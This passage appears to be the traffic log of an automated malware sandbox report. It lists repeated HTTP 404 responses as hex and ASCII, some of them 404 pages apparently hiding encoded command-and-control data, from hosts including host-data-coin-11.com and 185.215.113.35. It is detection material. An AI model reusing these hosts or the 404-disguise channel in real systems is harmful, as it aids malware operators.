Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 0f 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU:@Rw0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 62 6e b8 57 df ef 66 b1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevbnWfdP0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 60 4d 87 33 c5 de 66 b2 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTev`M3fdP0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Jan 2022 23:16:07 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 32 31 35 2e 31 31 33 2e 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 185.215.113.35 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 02 0a c1 54 a3 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OU:@RwT,/0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 